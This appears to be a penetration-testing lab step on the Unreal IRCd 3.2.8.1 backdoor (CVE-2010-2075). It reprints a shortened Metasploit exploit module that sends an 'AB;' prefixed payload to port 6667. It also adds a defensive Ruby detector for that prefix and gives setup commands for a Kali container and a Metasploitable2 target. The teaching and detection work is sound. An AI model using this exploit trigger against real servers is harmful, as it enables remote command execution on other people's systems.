Understand the Unreal IRCd Vulnerability and Start the Experiment Environment
Unreal IRCd version 3.2.8.1 contains a backdoor vulnerability (CVE-2010-2075) that allows remote attackers to execute arbitrary code on the affected system. The vulnerability exists in the DEBUG3_DOLOG_SYSTEM macro, which includes external malicious code that can be leveraged by an attacker.
Relevant information:
The Metasploit module for exploiting this vulnerability:
Here's a brief overview of the Metasploit module:
```ruby
# Require necessary modules
require 'msf/core'

# Define the Metasploit module class
class MetasploitModule < Msf::Exploit::Remote
  # Module initialization with details like name, description, author, references, etc.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'UnrealIRCD 3.2.8.1 Backdoor Command Execution',
      'Description' => %q{
        This module exploits a malicious backdoor that was added to the
        Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
        Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
      },
      # ... (omitted for brevity)
    ))

    # Set default options
    register_options(
      [
        Opt::RPORT(6667)
      ], self.class)
  end

  # Exploit method
  def exploit
    # Connect to the remote service
    connect

    # Print banner information
    print_status("Connected to #{rhost}:#{rport}...")
    banner = sock.get_once(-1, 30)
    banner.to_s.split("\n").each do |line|
      print_line(" #{line}")
    end

    # Send the backdoor command
    print_status("Sending backdoor command...")
    sock.put("AB;" + payload.encoded + "\n")

    # Wait for session creation or timeout
    1.upto(120) do
      break if session_created?
      select(nil, nil, nil, 0.25)
      handler()
    end
    disconnect
  end
end
```
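For defenders, the module shows what to look for on the wire: a client payload that begins with `AB;`. The following Ruby script is an added example, not part of the original lab or of Metasploit; it scans a capture log for payloads starting with that prefix. The tab-separated log format, the `Hit` struct, the function name and all sample records are assumptions constructed for illustration.

```ruby
# Added example (not from the lab or Metasploit): detect the "AB;" trigger.
TRIGGER = "AB;".b # prefix taken from the module's sock.put("AB;" + ...) call

# Hypothetical result record used for triage output.
Hit = Struct.new(:time, :src, :dst, :preview)

# Constructed capture of client-to-server payloads, one record per line:
# time <TAB> source <TAB> destination <TAB> payload. All values are samples.
SAMPLE_LOG = [
  ["10:00:01", "192.168.122.50:40112", "192.168.122.102:6667", "NICK alice"],
  ["10:00:01", "192.168.122.50:40112", "192.168.122.102:6667", "USER alice 0 * :Alice"],
  ["10:00:09", "192.168.122.50:40112", "192.168.122.102:6667",
   "PRIVMSG #lab :the writeup mentions AB;something"],
  ["10:02:30", "192.168.122.1:51514", "192.168.122.102:6667",
   "AB;echo constructed-sample"],
  ["10:02:31", "192.168.122.50:40112", "192.168.122.102:6667", "AWAY :brb"],
  ["truncated record without enough fields"]
].map { |fields| fields.join("\t") }.join("\n")

# Returns one Hit per payload that starts with the trigger prefix.
def find_backdoor_triggers(log_text)
  # Work on raw bytes so non-UTF-8 payloads cannot raise encoding errors.
  log_text.b.each_line.filter_map do |record|
    time, src, dst, payload = record.chomp.split("\t", 4)
    next if payload.nil? # malformed record, fewer than four fields

    # Match only at the very start of the payload, as the module sends it.
    # Chat text that merely mentions the prefix must not raise an alert.
    next unless payload.start_with?(TRIGGER)

    # Keep a short, printable preview so the alert is safe to display.
    preview = payload[0, 40].gsub(/[^\x20-\x7e]/n, ".")
    Hit.new(time, src, dst, preview)
  end
end

if __FILE__ == $PROGRAM_NAME
  find_backdoor_triggers(SAMPLE_LOG).each do |hit|
    puts "ALERT #{hit.time} #{hit.src} -> #{hit.dst} payload=#{hit.preview.inspect}"
  end
end
```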
Now you will start the attack machine (Kali Linux container) and the target machine (Metasploitable2 virtual machine) for the experiment.
- Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:

  ```bash
  sudo virsh start Metasploitable2
  ```

- Test the connectivity to the target machine by pinging it:

  ```bash
  ping 192.168.122.102
  ```

  Press Ctrl+C to stop the ping.

- Launch the Kali Linux container and enter the bash environment by running:

  ```bash
  docker run -ti --network host b5b709a49cd5 bash
  ```

- Inside the Kali container, test the network connection to the target machine:

  ```bash
  ping 192.168.122.102
  ```

  Press Ctrl+C to stop the ping.

Now both the attack machine and the target machine are running, and you can start the penetration testing.
Note: If you accidentally exit the current bash, the Kali container will automatically stop. You can execute `docker run -ti --network host b5b709a49cd5 bash` again on the host to start a new Kali container and enter bash to continue the experiment.